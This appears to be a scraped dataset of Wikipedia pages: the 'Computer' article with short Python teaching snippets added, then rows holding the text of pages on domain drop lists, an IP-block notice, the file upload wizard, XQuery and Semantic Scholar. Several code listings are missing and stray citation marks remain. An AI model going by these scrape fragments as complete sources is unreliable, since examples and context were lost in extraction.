While a computer may be viewed as running one gigantic program stored in its main memory, in some systems it is necessary to give the appearance of running several programs simultaneously. This is achieved by multitasking i.e. having the computer switch rapidly between running each program in turn. 116 One means by which this is done is with a special signal called an interrupt, which can periodically cause the computer to stop executing instructions where it was and do something else instead. By remembering where it was executing prior to the interrupt, the computer can return to that task later. If several programs are running "at the same time". then the interrupt generator might be causing several hundred interrupts per second, causing a program switch each time. Since modern computers typically execute instructions several orders of magnitude faster than human perception, it may appear that many programs are running at the same time even though only one is ever executing in any given instant. This method of multitasking is sometimes termed "time-sharing" since each program is allocated a "slice" of time in turn. 117 Before the era of inexpensive computers, the principal use for multitasking was to allow many people to share the same computer. Seemingly, multitasking would cause a computer that is switching between several programs to run more slowly, in direct proportion to the number of programs it is running, but most programs spend much of their time waiting for slow input output devices to complete their tasks. If a program is waiting for the user to click on the mouse or press a key on the keyboard, then it will not take a "time slice" until the event it is waiting for has occurred. This frees up time for other programs to execute so that many programs may be run simultaneously without unacceptable speed loss. Some computers are designed to distribute their work across several CPUs in a multiprocessing configuration, a technique once employed in only large and powerful machines such as supercomputers, mainframe computers and servers. Multiprocessor and multi-core (multiple CPUs on a single integrated circuit) personal and laptop computers are now widely available, and are being increasingly used in lower-end markets as a result. Supercomputers in particular often have highly unique architectures that differ significantly from the basic stored-program architecture and from general-purpose computers. g They often feature thousands of CPUs, customized high-speed interconnects, and specialized computing hardware. Such designs tend to be useful for only specialized tasks due to the large scale of program organization required to use most of the available resources at once. Supercomputers usually see usage in large-scale simulation, graphics rendering, and cryptography applications, as well as with other so-called "embarrassingly parallel" tasks. Software refers to parts of the computer which do not have a material form, such as programs, data, protocols, etc. Software is that part of a computer system that consists of encoded information or computer instructions, in contrast to the physical hardware from which the system is built. Computer software includes computer programs, libraries and related non-executable data, such as online documentation or digital media. It is often divided into system software and application software. Computer hardware and software require each other and neither can be realistically used on its own. 
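The time-slicing idea described above can be mimicked with Python generators. This is only a toy cooperative scheduler for illustration; real operating systems rely on hardware interrupts and preemption rather than on programs volunteering to yield.
# Toy time-sharing: each "program" is a generator that yields after a little
# work, and the loop below hands out time slices in round-robin order.
def count_up(name, limit):
    for i in range(limit):
        print(f"{name}: {i}")
        yield                          # end of this program's time slice

def run_round_robin(programs):
    while programs:
        for program in list(programs):
            try:
                next(program)          # give the program one slice of time
            except StopIteration:
                programs.remove(program)   # the program has finished

run_round_robin([count_up("A", 3), count_up("B", 2)])
# The output interleaves A and B, giving the appearance of simultaneous execution.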
When software is stored in hardware that cannot easily be modified, such as with BIOS ROM in an IBM PC compatible computer, it is sometimes called "firmware". There are thousands of different programming languages—some intended for general purpose, others useful for only highly specialized applications. The defining feature of modern computers which distinguishes them from all other machines is that they can be programmed. That is to say that some type of instructions (the program) can be given to the computer, and it will process them. Modern computers based on the von Neumann architecture often have machine code in the form of an imperative programming language. In practical terms, a computer program may be just a few instructions or extend to many millions of instructions, as do the programs for word processors and web browsers for example. A typical modern computer can execute billions of instructions per second (gigaflops) and rarely makes a mistake over many years of operation. Large computer programs consisting of several million instructions may take teams of programmers years to write, and due to the complexity of the task almost certainly contain errors. This section applies to most common RAM machine based computers. In most cases, computer instructions are simple: add one number to another, move some data from one location to another, send a message to some external device, etc. These instructions are read from the computer's memory and are generally carried out (executed) in the order they were given. However, there are usually specialized instructions to tell the computer to jump ahead or backwards to some other place in the program and to carry on executing from there. These are called "jump" instructions (or branches). Furthermore, jump instructions may be made to happen conditionally so that different sequences of instructions may be used depending on the result of some previous calculation or some external event. Many computers directly support subroutines by providing a type of jump that "remembers" the location it jumped from and another instruction to return to the instruction following that jump instruction. Program execution might be likened to reading a book. While a person will normally read each word and line in sequence, they may at times jump back to an earlier place in the text or skip sections that are not of interest. Similarly, a computer may sometimes go back and repeat the instructions in some section of the program over and over again until some internal condition is met. This is called the flow of control within the program and it is what allows the computer to perform tasks repeatedly without human intervention. Comparatively, a person using a pocket calculator can perform a basic arithmetic operation such as adding two numbers with just a few button presses. But to add together all of the numbers from 1 to 1,000 would take thousands of button presses and a lot of time, with a near certainty of making a mistake. On the other hand, a computer may be programmed to do this with just a few simple instructions. The following example is written in the MIPS assembly language: Once told to run this program, the computer will perform the repetitive addition task without further human intervention. It will almost never make a mistake and a modern PC can complete the task in a fraction of a second. In most computers, individual instructions are stored as machine code with each instruction being given a unique number (its operation code or opcode for short). 
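The MIPS assembly listing referred to in the passage above did not survive the scrape. As a rough stand-in only, here is the same repetitive-addition task (adding the numbers from 1 to 1,000) written in Python, the language used elsewhere in this notebook; it illustrates the "few simple instructions" point but is not the original listing.
# Stand-in for the missing MIPS example: add the numbers from 1 to 1,000.
total = 0
n = 1
while n <= 1000:      # conditional branch: keep looping until n passes 1000
    total += n        # the repeated addition
    n += 1            # move on to the next number
print(total)          # 500500

# The same result via a built-in, or the closed form 1000 * 1001 // 2.
print(sum(range(1, 1001)))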
The command to add two numbers together would have one opcode; the command to multiply them would have a different opcode, and so on. The simplest computers are able to perform any of a handful of different instructions; the more complex computers have several hundred to choose from, each with a unique numerical code. Since the computer's memory is able to store numbers, it can also store the instruction codes. This leads to the important fact that entire programs (which are just lists of these instructions) can be represented as lists of numbers and can themselves be manipulated inside the computer in the same way as numeric data. The fundamental concept of storing programs in the computer's memory alongside the data they operate on is the crux of the von Neumann, or stored program, architecture. 119 120 In some cases, a computer might store some or all of its program in memory that is kept separate from the data it operates on. This is called the Harvard architecture after the Harvard Mark I computer. Modern von Neumann computers display some traits of the Harvard architecture in their designs, such as in CPU caches. While it is possible to write computer programs as long lists of numbers (machine language) and while this technique was used with many early computers, h it is extremely tedious and potentially error-prone to do so in practice, especially for complicated programs. Instead, each basic instruction can be given a short name that is indicative of its function and easy to remember a mnemonic such as ADD, SUB, MULT or JUMP. These mnemonics are collectively known as a computer's assembly language. Converting programs written in assembly language into something the computer can actually understand (machine language) is usually done by a computer program called an assembler. Programming languages provide various ways of specifying programs for computers to run. Unlike natural languages, programming languages are designed to permit no ambiguity and to be concise. They are purely written languages and are often difficult to read aloud. They are generally either translated into machine code by a compiler or an assembler before being run, or translated directly at run time by an interpreter. Sometimes programs are executed by a hybrid method of the two techniques. Machine languages and the assembly languages that represent them (collectively termed low-level programming languages) are generally unique to the particular architecture of a computer's central processing unit (CPU). For instance, an ARM architecture CPU (such as may be found in a smartphone or a hand-held videogame) cannot understand the machine language of an x86 CPU that might be in a PC. i Historically a significant number of other cpu architectures were created and saw extensive use, notably including the MOS Technology 6502 and 6510 in addition to the Zilog Z80. Although considerably easier than in machine language, writing long programs in assembly language is often difficult and is also error prone. Therefore, most practical programs are written in more abstract high-level programming languages that are able to express the needs of the programmer more conveniently (and thereby help reduce programmer error). High level languages are usually "compiled" into machine language (or sometimes into assembly language and then into machine language) using another computer program called a compiler. 
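The point that instructions are just numbers stored alongside data can be sketched in a few lines of Python. Everything below is invented for illustration: the three-instruction set, the opcode numbering and the toy "assembler" do not correspond to any real CPU or assembly language.
# Hypothetical stored-program machine: the program is a plain list of numbers.
OPCODES = {"LOAD": 1, "ADD": 2, "PRINT": 3}        # mnemonic -> opcode (invented)

def assemble(source_lines):
    # Toy assembler: translate mnemonics and operands into numeric machine code.
    program = []
    for line in source_lines:
        mnemonic, *operands = line.split()
        program.append(OPCODES[mnemonic])
        program.extend(int(x) for x in operands)
    return program

def run(program):
    accumulator, pc = 0, 0                          # pc is the program counter
    while pc < len(program):
        opcode = program[pc]
        if opcode == OPCODES["LOAD"]:
            accumulator = program[pc + 1]; pc += 2
        elif opcode == OPCODES["ADD"]:
            accumulator += program[pc + 1]; pc += 2
        elif opcode == OPCODES["PRINT"]:
            print(accumulator); pc += 1

machine_code = assemble(["LOAD 40", "ADD 2", "PRINT"])
print(machine_code)    # [1, 40, 2, 2, 3] -- the program itself is just numbers
run(machine_code)      # 42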
j High level languages are less related to the workings of the target computer than assembly language, and more related to the language and structure of the problem(s) to be solved by the final program. It is therefore often possible to use different compilers to translate the same high level language program into the machine language of many different types of computer. This is part of the means by which software like video games may be made available for different computer architectures such as personal computers and various video game consoles. Program design of small programs is relatively simple and involves the analysis of the problem, collection of inputs, using the programming constructs within languages, devising or using established procedures and algorithms, providing data for output devices and solutions to the problem as applicable. 121 As problems become larger and more complex, features such as subprograms, modules, formal documentation, and new paradigms such as object-oriented programming are encountered. 122 Large programs involving thousands of line of code and more require formal software methodologies. 123 The task of developing large software systems presents a significant intellectual challenge. 124 Producing software with an acceptably high reliability within a predictable schedule and budget has historically been difficult; 125 the academic and professional discipline of software engineering concentrates specifically on this challenge. 126 Errors in computer programs are called "bugs". They may be benign and not affect the usefulness of the program, or have only subtle effects. However, in some cases they may cause the program or the entire system to "hang", becoming unresponsive to input such as mouse clicks or keystrokes, to completely fail, or to crash. 127 Otherwise benign bugs may sometimes be harnessed for malicious intent by an unscrupulous user writing an exploit, code designed to take advantage of a bug and disrupt a computer's proper execution. Bugs are usually not the fault of the computer. Since computers merely execute the instructions they are given, bugs are nearly always the result of programmer error or an oversight made in the program's design. k Admiral Grace Hopper, an American computer scientist and developer of the first compiler, is credited for having first used the term "bugs" in computing after a dead moth was found shorting a relay in the Harvard Mark II computer in September 1947. 128 Computers have been used to coordinate information between multiple locations since the 1950s. The U.S. military's SAGE system was the first large-scale example of such a system, which led to a number of special-purpose commercial systems such as Sabre. 129 In the 1970s, computer engineers at research institutions throughout the United States began to link their computers together using telecommunications technology. The effort was funded by ARPA (now DARPA), and the computer network that resulted was called the ARPANET. 130 The technologies that made the Arpanet possible spread and evolved. In time, the network spread beyond academic and military institutions and became known as the Internet. The emergence of networking involved a redefinition of the nature and boundaries of the computer. Computer operating systems and applications were modified to include the ability to define and access the resources of other computers on the network, such as peripheral devices, stored information, and the like, as extensions of the resources of an individual computer. 
Initially these facilities were available primarily to people working in high-tech environments, but in the 1990s the spread of applications like e-mail and the World Wide Web, combined with the development of cheap, fast networking technologies like Ethernet and ADSL saw computer networking become almost ubiquitous. In fact, the number of computers that are networked is growing phenomenally. A very large proportion of personal computers regularly connect to the Internet to communicate and receive information. "Wireless" networking, often utilizing mobile phone networks, has meant networking is becoming increasingly ubiquitous even in mobile computing environments. A computer does not need to be electronic, nor even have a processor, nor RAM, nor even a hard disk. While popular usage of the word "computer" is synonymous with a personal electronic computer, l a typical modern definition of a computer is: "A device that computes, especially a programmable usually electronic machine that performs high-speed mathematical or logical operations or that assembles, stores, correlates, or otherwise processes information. 131 According to this definition, any device that processes information qualifies as a computer. There is active research to make non-classical computers out of many promising new types of technology, such as optical computers, DNA computers, neural computers, and quantum computers. Most computers are universal, and are able to calculate any computable function, and are limited only by their memory capacity and operating speed. However different designs of computers can give very different performance for particular problems; for example quantum computers can potentially break some modern encryption algorithms (by quantum factoring) very quickly. There are many types of computer architectures: Of all these abstract machines, a quantum computer holds the most promise for revolutionizing computing. 132 Logic gates are a common abstraction which can apply to most of the above digital or analog paradigms. The ability to store and execute lists of instructions called programs makes computers extremely versatile, distinguishing them from calculators. The Church Turing thesis is a mathematical statement of this versatility: any computer with a minimum capability (being Turing-complete) is, in principle, capable of performing the same tasks that any other computer can perform. Therefore, any type of computer (netbook, supercomputer, cellular automaton, etc.) is able to perform the same computational tasks, given enough time and storage capacity. A computer will solve problems in exactly the way it is programmed to, without regard to efficiency, alternative solutions, possible shortcuts, or possible errors in the code. Computer programs that learn and adapt are part of the emerging field of artificial intelligence and machine learning. Artificial intelligence based products generally fall into two major categories: rule-based systems and pattern recognition systems. Rule-based systems attempt to represent the rules used by human experts and tend to be expensive to develop. Pattern-based systems use data about a problem to generate conclusions. Examples of pattern-based systems include voice recognition, font recognition, translation and the emerging field of on-line marketing. As the use of computers has spread throughout society, there are an increasing number of careers involving computers. 
The need for computers to work well together and to be able to exchange information has spawned the need for many standards organizations, clubs and societies of both a formal and informal nature. |
501 | https://en.wikipedia.org/wiki/Web_scraping | https://en.wikipedia.org/wiki/Domain_name_drop_list | A domain name drop list is a list containing the expired domain names that could be deleted from the domain name registry in the near future. These lists are typically used by domainers to locate expiring domain names with value. There is no defined date range for the data contained within a drop list, as lists can contain anywhere from 1 day's worth of expiring domain names to 30 or more days' worth. Some drop lists contain only domain names that follow the domain name deletion process (where the domain name enters the REGISTRAR-HOLD status, followed by REDEMPTIONPERIOD, and PENDINGDELETE), some contain only pre-release domain names, and some contain both pre-release and regular domain names. The data contained within a drop list can also vary, with some lists providing only basic information, such as the domain name and its expiry date. Other drop lists provide more detailed statistics, including, among others, PageRank, link popularity and Alexa rank. Critics say that the promotion and marketing of so-called drop lists may encourage cybercrime and payoffs at registrars, noting that registrants can lose their domains without ever having abandoned them. When a domain name is abandoned, or its period of validity is not renewed (expires), the web host and registrar then carry out a "deletion" (the drop). Once a domain name has been deleted from the internet, it ceases to exist. Anyone may then register that name (the catch). The process of re-registering expired names is known as dropcatching, and various domain name registries have differing views on it. 1 Sometimes people get locked out of their email and cannot reply to the renewal request (or are otherwise obstructed or hacked), and their domain name may be deleted and offered as available. |
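Since this notebook already loads pandas, a drop list like the ones described above can be filtered in a few lines. The file name droplist.csv and the column names (domain, expiry_date, status) are hypothetical; real drop-list feeds differ from provider to provider.
import pandas as pd

# Hypothetical drop-list file with columns: domain, expiry_date, status
droplist = pd.read_csv("droplist.csv", parse_dates=["expiry_date"])

# Keep only names already in the deletion pipeline described above
pending = droplist[droplist["status"].isin(["REDEMPTIONPERIOD", "PENDINGDELETE"])]

# Short .com names dropping within the next 7 days
soon = pending[
    pending["domain"].str.endswith(".com")
    & (pending["domain"].str.len() <= 12)
    & (pending["expiry_date"] <= pd.Timestamp.now() + pd.Timedelta(days=7))
]
print(soon.sort_values("expiry_date").head(10))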
502 | https://en.wikipedia.org/wiki/Data_scraping | https://en.wikipedia.org/w/index.php?title=Special:QrCode&url=https%3A%2F%2Fen.wikipedia.org%2Fwiki%2FData_scraping | The IP address or range 180.190.0.0 16 has been blocked by Stwalkerster for the following reason(s): Editing from this range has been disabled (blocked) in response to abuse. A range may be shared by many users and innocent users may be affected; if you believe that you are not the person this block is intended for, please follow the instructions below: If you have an account: Please log in to edit. In rare cases, in response to serious abuse, logged-in editing may also be disabled. If you still cannot edit, place unblock on your talk page and make reference to this message. You may wish to ping the blocking administrator or email them via the "email this user" function. If you do not have an account: Registered users are still able to edit. If you cannot create an account from this or another network, you may request that volunteers create your username for you. Please follow the instructions at Wikipedia:Request an account to request an account under your preferred username. It may take some time to process your request. Administrators: Please consult the blocking administrator before altering or lifting this block, and consider consulting with a CheckUser before granting an IP block exemption to an editor using this range. Note that large or hard (logged-in editing blocked) rangeblocks are usually only made in response to serious abuse, and the blocking admin may have information about this block which is essential to reviewing any unblock request. This block will expire on 09:06, 22 May 2032. Your current IP address is 180.190.75.212. Even when blocked, you will usually still be able to edit your user talk page, as well as email administrators and other editors. For information on how to proceed, please read the FAQ for blocked users and the guideline on block appeals. The guide to appealing blocks may also be helpful. Other useful links: Blocking policy Help:I have been blocked This block affects editing on all Wikimedia wikis. The IP address or range 180.190.0.0 16 has been globally blocked by for the following reason(s): Long-term abuse: If you are affected by this block, please message us: request This block will expire on 17:48, 21 December 2024. Your current IP address is 180.190.75.212. Even while globally blocked, you will usually still be able to edit pages on Meta-Wiki. If you believe you were blocked by mistake, you can find additional information and instructions in the No open proxies global policy. Otherwise, to discuss the block please post a request for review on Meta-Wiki. You could also send an email to the stewards VRT queue at stewards wikimedia.org including all above details. Other useful links: Global blocks Help:I have been blocked Return to Main Page. |
503 | https://en.wikipedia.org/wiki/Web_scraping | https://en.wikipedia.org/wiki/Wikipedia:File_upload_wizard | Thank you for offering to contribute an image or other media file for use on Wikipedia. This wizard will guide you through a questionnaire prompting you for the appropriate copyright and sourcing information for each file. Please ensure you understand copyright and the image use policy before proceeding. Uploads to Wikimedia Commons Upload a non-free file Uploads locally to the English Wikipedia; must comply with the non-free content criteria You do not have JavaScript enabled Sorry, in order to use this uploading script, JavaScript must be enabled. You can still use the plain Special:Upload page to upload files to the English Wikipedia without JavaScript. You are not currently logged in. Sorry, in order to use this uploading script and to upload files, you need to be logged in with your named account. Please log in and then try again. Your account has not become confirmed yet. Sorry, in order to upload files on the English Wikipedia, you need to have a confirmed account. Normally, your account will become confirmed automatically once you have made 10 edits and four days have passed since you created it. You may already be able to upload files on the Wikimedia Commons, but you can't do it on the English Wikipedia just yet. If the file you want to upload has a free license, please go to Commons and upload it there. Important note: if you don't want to wait until you are autoconfirmed, you may ask somebody else to upload a file for you at Wikipedia:Files for upload. In very rare cases an administrator may make your account confirmed manually through a request at Wikipedia:Requests for permissions Confirmed. Sorry, a few special characters and character combinations cannot be used in the filename for technical reasons. This goes especially for : and . Your filename has been modified to avoid these. Please check if it is okay now. The filename you chose seems to be very short, or overly generic. Please don't use: A file of this name already exists on Commons If you upload your file with this name, you will be masking the existing file and make it inaccessible. Your new file will be displayed everywhere the existing file was previously used. This should not be done, except in very rare exceptional cases. Please don't upload your file under this name, unless you seriously know what you are doing. Choose a different name for your new file instead. A file of this name already exists. If you upload your file with this name, you will be overwriting the existing file. Your new file will be displayed everywhere the existing file was previously used. Please don't do this, unless you have a good reason to: It is very important that you read through the following options and questions, and provide all required information truthfully and carefully. Thank you for offering to upload a free work. Wikipedia loves free files. However, we would love it even more if you uploaded them on our sister project, the Wikimedia Commons. Files uploaded on Commons can be used immediately here on Wikipedia as well as on all its sister projects. Uploading files on Commons works just the same as here. Your Wikipedia account will automatically work on Commons too. Please consider uploading your file on Commons. However, if you prefer to do it here instead, you may go ahead with this form. You can also first use this form to collect the information about your file and then send it to Commons from here. 
Please note that by "entirely self-made" we really mean just that. Do not use this section for any of the following: Editors who falsely declare such items as their "own work" will be blocked from editing. Use this only if there is an explicit licensing statement in the source. The website must explicitly say that the image is released under a license that allows free re-use for any purpose, e.g. the Creative Commons Attribution license. You must be able to point exactly to where it says this. If the source website doesn't say so explicitly, please do not upload the file. Public Domain means that nobody owns any copyrights on this work. It does not mean simply that it is freely viewable somewhere on the web or that it has been widely used by others. This is not for images you simply found somewhere on the web. Most images on the web are under copyright and belong to somebody, even if you believe the owner won't care about that copyright. If it is in the public domain, you must be able to point to an actual law that makes it so. If you can't point to such a law but merely found this image somewhere, then please do not upload it. Please remember that you will need to demonstrate that: This file will be used in the following article: Enter the name of exactly one Wikipedia article, without the ... brackets and without the "http: en.wikipedia.org ... URL code. It has to be an actual article, not a talkpage, template, user page, etc. If you plan to use the file in more than one article, please name only one of them here. Then, after uploading, open the image description page for editing and add your separate explanations for each additional article manually. Example article okay. This article doesn't exist The article Example could not be found. Please check the spelling, and make sure you enter the name of an existing article in which you will include this file. If this is an article you are only planning to write, please write it first and upload the file afterwards. This is not an actual encyclopedia article The page Example is not in the main article namespace. Non-free files can only be used in mainspace article pages, not on a user page, talk page, template, etc. Please upload this file only if it is going to be used in an actual article. If this page is an article draft in your user space, we're sorry, but we must ask you to wait until the page is ready and has been moved into mainspace, and only upload the file after that. This is a disambiguation page The page Example is not a real article, but a disambiguation page pointing to a number of other pages. Please check and enter the exact title of the actual target article you meant. If neither of these two statements applies, then please do not upload this image. This section is not for images used merely to illustrate an article about a person or thing, showing what that person or thing look like. In view of this, please explain how the use of this file will be minimal. Well, we're very sorry, but if you're not sure about this file's copyright status, or if it doesn't fit into any of the groups above, then: Please don't upload it. Really, please don't. Even if you think it would make for a great addition to an article. We really take these copyright rules very seriously on Wikipedia. Note that media is assumed to be fully-copyrighted unless shown otherwise; the burden is on the uploader. In particular, please don't upload: If you are in any doubt, please ask some experienced editors for advice before uploading. 
People will be happy to assist you at Wikipedia:Media copyright questions. Thank you. This is the data that will be submitted to upload: Your file is being uploaded. This might take a minute or two, depending on the size of the file and the speed of your internet connection. Once uploading is completed, you will find your new file at this link: File:Example.jpg Your file has been uploaded successfully and can now be found here: File:Example.jpg Please follow the link and check that the image description page has all the information you meant to include. If you want to change the description, just go to the image page, click the "edit" tab at the top of the page and edit just as you would edit any other page. Do not go through this upload form again, unless you want to replace the actual file with a new version. To insert this file into an article, you may want to use code similar to the following: If you wish to make a link to the file in text, without actually showing the image, for instance when discussing the image on a talk page, you can use the following (mark the : after the initial brackets ): See Wikipedia:Picture tutorial for more detailed help on how to insert and position images in pages. Thank you for using the File Upload Wizard.Please leave your feedback, comments, bug reports or suggestions on the talk page. |
504 | https://en.wikipedia.org/wiki/Web_scraping | https://en.wikipedia.org/wiki/XQuery | XQuery (XML Query) is a query and functional programming language that queries and transforms collections of structured and unstructured data, usually in the form of XML, text and with vendor-specific extensions for other data formats (JSON, binary, etc.). The language is developed by the XML Query working group of the W3C. The work is closely coordinated with the development of XSLT by the XSL Working Group; the two groups share responsibility for XPath, which is a subset of XQuery. XQuery 1.0 became a W3C Recommendation on January 23, 2007. 4 XQuery 3.0 became a W3C Recommendation on April 8, 2014. 5 XQuery 3.1 became a W3C Recommendation on March 21, 2017. 6 "The mission of the XML Query project is to provide flexible query facilities to extract data from real and virtual documents on the World Wide Web, therefore finally providing the needed interaction between the Web world and the database world. Ultimately, collections of XML files will be accessed like databases. 7 XQuery is a functional, side effect-free, expression-oriented programming language with a simple type system, summed up by Kilpel inen: 8 All XQuery expressions operate on sequences, and evaluate to sequences. Sequences are ordered lists of items. Items can be either nodes, which represent components of XML documents, or atomic values, which are instances of XML Schema base types like xs:integer or xs:string. Sequences can also be empty, or consist of a single item only. No distinction is made between a single item and a singleton sequence. (...) XQuery XPath sequences differ from lists in languages like Lisp and Prolog by excluding nested sequences. Designers of XQuery may have considered nested sequences unnecessary for the manipulation of document contents. Nesting, or hierarchy of document structures is instead represented by nodes and their child-parent relationships XQuery provides the means to extract and manipulate data from XML documents or any data source that can be viewed as XML, such as relational databases 9 or office documents. XQuery contains a superset of XPath expression syntax to address specific parts of an XML document. It supplements this with a SQL-like "FLWOR expression" for performing joins. A FLWOR expression is constructed from the five clauses after which it is named: FOR, LET, WHERE, ORDER BY, RETURN. The language also provides syntax allowing new XML documents to be constructed. Where the element and attribute names are known in advance, an XML-like syntax can be used; in other cases, expressions referred to as dynamic node constructors are available. All these constructs are defined as expressions within the language, and can be arbitrarily nested. The language is based on the XQuery and XPath Data Model (XDM) which uses a tree-structured model of the information content of an XML document, containing seven kinds of nodes: document nodes, elements, attributes, text nodes, comments, processing instructions, and namespaces. XDM also models all values as sequences (a singleton value is considered to be a sequence of length one). The items in a sequence can either be XML nodes or atomic values. Atomic values may be integers, strings, booleans, and so on: the full list of types is based on the primitive types defined in XML Schema. 
Features for updating XML documents or databases, and full text search capability, are not part of the core language, but are defined in add-on extension standards: XQuery Update Facility 1.0 supports update feature and XQuery and XPath Full Text 1.0 supports full text search in XML documents. XQuery 3.0 adds support for full functional programming, in that functions are values that can be manipulated (stored in variables, passed to higher-order functions, and dynamically called). The sample XQuery code below lists the unique speakers in each act of Shakespeare's play Hamlet, encoded in hamlet.xml All XQuery constructs for performing computations are expressions. There are no statements, even though some of the keywords appear to suggest statement-like behaviors. To execute a function, the expression within the body is evaluated and its value is returned. Thus to write a function to double an input value, one simply writes: To write a full query saying 'Hello World', one writes the expression: This style is common in functional programming languages. Below are a few examples of how XQuery can be used: Although XQuery was initially conceived as a query language for large collections of XML documents, it is also capable of transforming individual documents. As such, its capabilities overlap with XSLT, which was designed expressly to allow input XML documents to be transformed into HTML or other formats. The XSLT 2.0 and XQuery standards were developed by separate working groups within W3C, working together to ensure a common approach where appropriate. They share the same data model (XDM), type system, and function library, and both include XPath 2.0 as a sublanguage. The two languages, however, are rooted in different traditions and serve the needs of different communities. XSLT was primarily conceived as a stylesheet language whose primary goal was to render XML for the human reader on screen, on the web (as web template language), or on paper. XQuery was primarily conceived as a database query language in the tradition of SQL. Because the two languages originate in different communities, XSLT is stronger according to whom? in its handling of narrative documents with more flexible structure, while XQuery is stronger in its data handling (for example, when performing relational joins). XSLT 1.0 appeared as a Recommendation in 1999, whereas XQuery 1.0 only became a Recommendation in early 2007; as a result, XSLT is still much more widely used. Both languages have similar expressive power, though XSLT 2.0 has many features that are missing from XQuery 1.0, such as grouping, number and date formatting, and greater control over XML namespaces. 10 11 12 Many of these features were planned for XQuery 3.0. 13 Any comparison must take into account the version of XSLT. XSLT 1.0 and XSLT 2.0 are very different languages. XSLT 2.0, in particular, has been heavily influenced by XQuery in its move to strong typing and schema-awareness. Usability studies have shown that XQuery is easier to learn than XSLT, especially for users with previous experience of database languages such as SQL. 14 This can be attributed to the fact that XQuery is a smaller language with fewer concepts to learn, and to the fact that programs are more concise. It is also true that XQuery is more orthogonal, in that any expression can be used in any syntactic context. By contrast, XSLT is a two-language system in which XPath expressions can be nested in XSLT instructions but not vice versa. 
XSLT is currently stronger than XQuery for applications that involve making small changes to a document (for example, deleting all the NOTE elements). Such applications are generally handled in XSLT by use of a coding pattern that involves an identity template that copies all nodes unchanged, modified by specific templates that modify selected nodes. XQuery has no equivalent to this coding pattern, though in future versions it will be possible to tackle such problems using the update facilities in the language that are under development. 15 XQuery 1.0 lacked any kind of mechanism for dynamic binding or polymorphism; this has been remedied with the introduction of functions as first-class values in XQuery 3.0. The absence of this capability starts to become noticeable when writing large applications, or when writing code that is designed to be reusable in different environments. citation needed XSLT offers two complementary mechanisms in this area: the dynamic matching of template rules, and the ability to override rules using xsl:import, that make it possible to write applications with multiple customization layers. The absence of these facilities from XQuery 1.0 was a deliberate design decision: it has the consequence that XQuery is very amenable to static analysis, which is essential to achieve the level of optimization needed in database query languages. This also makes it easier to detect errors in XQuery code at compile time. The fact that XSLT 2.0 uses XML syntax makes it rather verbose in comparison to XQuery 1.0. However, many large applications take advantage of this capability by using XSLT to read, write, or modify stylesheets dynamically as part of a processing pipeline. The use of XML syntax also enables the use of XML-based tools for managing XSLT code. By contrast, XQuery syntax is more suitable for embedding in traditional programming languages such as Java (see XQuery API for Java) or C . If necessary, XQuery code can also be expressed in an XML syntax called XQueryX. The XQueryX representation of XQuery code is rather verbose and not convenient for humans, but can easily be processed with XML tools, for example transformed with XSLT stylesheets. 16 17 Two major extensions to the XQuery were developed by the W3C: Both reached Recommendation status as extensions to XQuery 1.0, but work on taking them forward to work with XQuery 3.0 was abandoned for lack of resources. Work on XQuery 3.0 was published as a Recommendation on 8 April 2014, 19 and XQuery 3.1 is a Recommendation as at February 2017. A scripting (procedural) extension for XQuery was designed, but never completed. 20 21 The EXPath Community Group 22 develops extensions to XQuery and other related standards (XPath, XSLT, XProc, and XForms). The following extensions are currently available: JSONiq is an extension of XQuery that adds support to extract and transform data from JSON documents. JSONiq is a superset of XQuery 3.0. It is published under the Creative Commons Attribution-ShareAlike 3.0 license. The EXQuery 27 project develops standards around creating portable XQuery applications. The following standards are currently available: |
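The scraped XQuery article above describes addressing parts of an XML tree and mentions a speakers-per-act example whose code did not survive the text cleaning. As a minimal sketch in Python (the language used throughout this notebook) rather than XQuery itself, the standard-library xml.etree.ElementTree module can evaluate simple XPath-style expressions; the PLAY/ACT/SPEECH/SPEAKER element names below are assumptions modeled on the common Shakespeare XML encoding, not output of this pipeline.

import xml.etree.ElementTree as ET

# Hypothetical fragment shaped like the hamlet.xml encoding mentioned above.
sample = """<PLAY>
  <ACT><TITLE>ACT I</TITLE>
    <SPEECH><SPEAKER>BERNARDO</SPEAKER></SPEECH>
    <SPEECH><SPEAKER>FRANCISCO</SPEAKER></SPEECH>
    <SPEECH><SPEAKER>BERNARDO</SPEAKER></SPEECH>
  </ACT>
</PLAY>"""

root = ET.fromstring(sample)
for act in root.findall("ACT"):
    # Collect the distinct speaker names within each act, as the FLWOR example does.
    speakers = sorted({s.text for s in act.findall(".//SPEAKER")})
    print(act.findtext("TITLE"), speakers)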
505 | https://en.wikipedia.org/wiki/Web_scraping | https://en.wikipedia.org/wiki/S2CID_(identifier) | Semantic Scholar is a research tool for scientific literature powered by artificial intelligence. It is developed at the Allen Institute for AI and was publicly released in November 2015. 2 Semantic Scholar uses modern techniques in natural language processing to support the research process, for example by providing automatically generated summaries of scholarly papers. 3 The Semantic Scholar team is actively researching the use of artificial intelligence in natural language processing, machine learning, human computer interaction, and information retrieval. 4 Semantic Scholar began as a database for the topics of computer science, geoscience, and neuroscience. 5 In 2017, the system began including biomedical literature in its corpus. 5 As of September 2022 update , it includes over 200 million publications from all fields of science. 6 Semantic Scholar provides a one-sentence summary of scientific literature. One of its aims was to address the challenge of reading numerous titles and lengthy abstracts on mobile devices. 7 It also seeks to ensure that the three million scientific papers published yearly reach readers, since it is estimated that only half of this literature is ever read. 8 Artificial intelligence is used to capture the essence of a paper, generating it through an "abstractive" technique. 3 The project uses a combination of machine learning, natural language processing, and machine vision to add a layer of semantic analysis to the traditional methods of citation analysis, and to extract relevant figures, tables, entities, and venues from papers. 9 10 Another key AI-powered feature is Research Feeds, an adaptive research recommender that uses AI to quickly learn what papers users care about reading and recommends the latest research to help scholars stay up to date. It uses a state-of-the-art paper embedding model trained using contrastive learning to find papers similar to those in each Library folder. 11 Semantic Scholar also offers Semantic Reader, an augmented reader with the potential to revolutionize scientific reading by making it more accessible and richly contextual. 12 Semantic Reader provides in-line citation cards that allow users to see citations with TLDR summaries as they read and skimming highlights that capture key points of a paper so users can digest faster. In contrast with Google Scholar and PubMed, Semantic Scholar is designed to highlight the most important and influential elements of a paper. 13 The AI technology is designed to identify hidden connections and links between research topics. 14 Like the previously cited search engines, Semantic Scholar also exploits graph structures, which include the Microsoft Academic Knowledge Graph, Springer Nature's SciGraph, and the Semantic Scholar Corpus (originally a 45 million papers corpus in computer science, neuroscience and biomedicine). 15 16 Each paper hosted by Semantic Scholar is assigned a unique identifier called the Semantic Scholar Corpus ID (abbreviated S2CID). The following entry is an example: Liu, Ying; Gayle, Albert A; Wilder-Smith, Annelies; Rockl v, Joacim (March 2020). "The reproductive number of COVID 19 is higher compared to SARS coronavirus". Journal of Travel Medicine. 